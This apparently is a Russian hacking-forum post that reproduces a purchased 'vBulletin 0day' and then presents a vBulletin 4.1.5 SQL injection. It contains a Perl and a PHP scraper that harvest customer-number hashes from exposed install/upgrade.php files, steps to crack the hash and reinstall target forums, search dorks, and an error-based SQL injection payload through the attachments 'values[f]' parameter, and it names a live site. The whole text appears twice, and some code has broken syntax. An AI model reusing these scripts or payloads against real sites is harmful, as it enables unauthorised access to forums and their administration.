Недавно искал новый сплоит под vBulletin.
Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея:
[code]
[/code]
Описание гласило:
[QUOTE]
[code]
Access to Admincp and Customer area.
The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php
----------------------------------------
Please Enter Your Customer Number
This is the number with which you log in to the vBulletin.com Members' Area
----------------------------------------
The result is MD5,
You will need to bruteforce it to get the 12 char uppercase customer number.
Then you can re-install the forum and access admin area.
[/code]
Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: #
# Google Dork: intext:Powered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to follow the tutorial and decrypt the MD5#
# #
# #
# #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
[code]
<!--
var IMGDIR_MISC = "../cpstyles/vBulletin_3_Default";
var CLEARGIFURL = "./clear.gif";
var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e";
var VERSION = "";
var SCRIPTINFO = {
version: "",
startat: "",
step : "",
only : ""
};
var ADMINDIR = "../admincp";
var TOTALSTEPS = 0;
var ABORTMSG = "Status: Aborted";
var UNEXPECTED_TEXT = "<strong>Unexpected Text:</strong><pre>%1$s</pre>";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->
[/code]
As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at crack my hash section
then log in, reset admin pass and have fun^^
[code]
Auto tool script coded in perl
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";
if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}
$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);
&search;
sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1. 8) Gecko/20100202 Firefox/3.5.8"
;
$request = $lwp->post($url, ["searchHash" => "Search"] ;
print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]
Shouts to: n0tch, shadow008
[/QUOTE]
На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:
[code]
<?php
set_time_limit(0);
if($argc < 2) {
echo "Usage: {$argv[0]} " . PHP_EOL;
exit;
}
$URL = $argv[1];
$arr = parse_url($URL);
### work with url
if(strpos($URL, '?')) die("Ohh, your URL is not valid" ;
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme'] $URL = 'http://' . $URL;
$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents($URL . "/install/upgrade.php" ;
}
elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php" ;
}
else die("something went wrong..." ;
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
echo "Hash: " . $hash . PHP_EOL;
$fp = fopen("hash.txt", "a+" ;
fwrite($fp, $hash . PHP_EOL);
}
?>
[/code]
А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.
[img];
После установки ни один из проверенных форумов не предложил сменить пароль.
Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:
[QUOTE]
vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at .
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.
[/QUOTE]
Для доступа в "Customer area" не достаточно емэйла и пароля.
Эксплоит оказался не рабочим, но что-то делать было нужно.
Мой вгляд пал на только что обновленную булку до версии: 4.1.5
[code]
mmoru.com
[/code]
Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи.
Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5.
Название: Уязвимость в vBulletin 4.1.5
Dork: Powered by Powered by vBulletin 4.1.5
Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments)
Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос.
Пример:
[php]:
[/php]
После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим:
[php]
<!--
Database error in vBulletin 4.1.5:
Invalid SQL:
SELECT
permissionsfrom, hidden, setpublish, publishdate, userid
FROM ds23fSDdfsdf_cms_node
WHERE
nodeid = -1599 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a);
MySQL Error : Duplicate column name '5.1.49-3'
Error Number : 1060
Request Date : Tuesday, February 12th 2013 @ 01:12:33 PM
Error Date : Tuesday, February 12th 2013 @ 01:12:33 PM
Script :
Referrer :
IP Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version :
-->
[/php]
С вами были Piv8Team (priv8.ru)
Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея:
[code]
[/code]
Описание гласило:
[QUOTE]
[code]
Access to Admincp and Customer area.
The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php
----------------------------------------
Please Enter Your Customer Number
This is the number with which you log in to the vBulletin.com Members' Area
----------------------------------------
The result is MD5,
You will need to bruteforce it to get the 12 char uppercase customer number.
Then you can re-install the forum and access admin area.
[/code]
Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: #
# Google Dork: intext:Powered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to follow the tutorial and decrypt the MD5#
# #
# #
# #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
[code]
<!--
var IMGDIR_MISC = "../cpstyles/vBulletin_3_Default";
var CLEARGIFURL = "./clear.gif";
var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e";
var VERSION = "";
var SCRIPTINFO = {
version: "",
startat: "",
step : "",
only : ""
};
var ADMINDIR = "../admincp";
var TOTALSTEPS = 0;
var ABORTMSG = "Status: Aborted";
var UNEXPECTED_TEXT = "<strong>Unexpected Text:</strong><pre>%1$s</pre>";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->
[/code]
As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at crack my hash section
then log in, reset admin pass and have fun^^
[code]
Auto tool script coded in perl
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";
if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}
$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);
&search;
sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1. 8) Gecko/20100202 Firefox/3.5.8"
;$request = $lwp->post($url, ["searchHash" => "Search"]
; print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]
Shouts to: n0tch, shadow008
[/QUOTE]
На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:
[code]
<?php
set_time_limit(0);
if($argc < 2) {
echo "Usage: {$argv[0]} " . PHP_EOL;
exit;
}
$URL = $argv[1];
$arr = parse_url($URL);
### work with url
if(strpos($URL, '?')) die("Ohh, your URL is not valid"
;if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']
$URL = 'http://' . $URL;$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents($URL . "/install/upgrade.php"
;}
elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php"
;}
else die("something went wrong..."
;preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
echo "Hash: " . $hash . PHP_EOL;
$fp = fopen("hash.txt", "a+"
;fwrite($fp, $hash . PHP_EOL);
}
?>
[/code]
А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.
[img];
После установки ни один из проверенных форумов не предложил сменить пароль.
Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:
[QUOTE]
vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at .
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.
[/QUOTE]
Для доступа в "Customer area" не достаточно емэйла и пароля.
Эксплоит оказался не рабочим, но что-то делать было нужно.
Мой вгляд пал на только что обновленную булку до версии: 4.1.5
[code]
mmoru.com
[/code]
Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи.
Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5.
Название: Уязвимость в vBulletin 4.1.5
Dork: Powered by Powered by vBulletin 4.1.5
Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments)
Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос.
Пример:
[php]:
[/php]
После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим:
[php]
<!--
Database error in vBulletin 4.1.5:
Invalid SQL:
SELECT
permissionsfrom, hidden, setpublish, publishdate, userid
FROM ds23fSDdfsdf_cms_node
WHERE
nodeid = -1599 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a);
MySQL Error : Duplicate column name '5.1.49-3'
Error Number : 1060
Request Date : Tuesday, February 12th 2013 @ 01:12:33 PM
Error Date : Tuesday, February 12th 2013 @ 01:12:33 PM
Script :
Referrer :
IP Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version :
-->
[/php]
С вами были Piv8Team (priv8.ru)